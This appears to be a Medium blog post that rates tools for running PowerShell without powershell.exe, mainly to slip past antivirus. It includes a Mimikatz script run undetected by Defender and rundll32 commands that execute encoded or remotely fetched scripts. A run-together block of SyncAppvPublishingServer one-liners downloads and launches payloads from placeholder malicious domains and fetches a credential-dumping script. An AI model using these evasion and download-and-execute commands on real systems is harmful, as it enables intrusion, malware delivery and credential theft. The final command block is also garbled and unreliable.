Run PowerShell without Powershell.exe — Best tools & techniques

Tools Analysis:

PowerLine

UserConf.xml with a custom Mimikatz ps1 script
Download locally the script and run it but Defender blocks it
Detection from Windows Defender
The script was imported correctly and runs without triggering the AV

VOTE: 9

NPS — Not PowerShell

cmdline:
nps.exe "{powershell single command}"
nps.exe "& {commands; semi-colon; separated}"
nps.exe -encodedcommand {base64_encoded_command}
nps.exe -encode "commands to encode to base64"
nps.exe -decode {base64_encoded_command}

VOTE: 4

PowerShdll

Rundll32 Usage:
rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -h Display this message
rundll32 PowerShdll,main -f <path> Run the script passed as argument
rundll32 PowerShdll,main -w Start an interactive console in a new window
rundll32 PowerShdll,main -i Start an interactive console in this console
Exe Usage:
PowerShdll.exe <script>
PowerShdll.exe -h Display this message
PowerShdll.exe -f <path> Run the script passed as argument
PowerShdll.exe -i Start an interactive console in this console
Run base64 encoded script:
rundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex
Download and run script
rundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

VOTE: 7

PowerLessShell

PowerLessShell on Kali for payload code creation
Code execution of the generated malicious payload

VOTE: 5

Nopowershell

VOTE: 6

SyncAppvPublishingServer

C:\Windows\System32\SyncAppvPublishingServer.vbs "Break; Start-Process Calc.exe ”C:\Windows\System32\SyncAppvPublishingServer.vbs "Break; iwr http://172.16.217.130:443"C:\Windows\System32\SyncAppvPublishingServer.vbs; Start-Process calcC:\Windows\System32\SyncAppvPublishingServer.vbs "Break; Start-Process cmd.exe '/c notepad.exe'"C:\Windows\System32\SyncAppvPublishingServer.exe \" Break; (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1','$env:USERPROFILE/1.ps1'); Start-Process '$env:USERPROFILE/1.ps1' -WindowStyle Minimized;"SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1') | IEX"C:\Windows\System32\SyncAppvPublishingServer.exe \" Break; (New-Object System.Net.WebClient).DownloadFile('[MaliciousDomain]/Win.exe','$env:USERPROFILE/payload.exe'); Start-Process '$env:USERPROFILE/payload.exe' -WindowStyle Minimized;"SyncAppvPublishingServer.vbs "n; ((New-Object Net.WebClient) .DownloadString ('http://malciousdomain/payload.ps1') | IEX '

VOTE: 7

CONCLUSIONS:

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store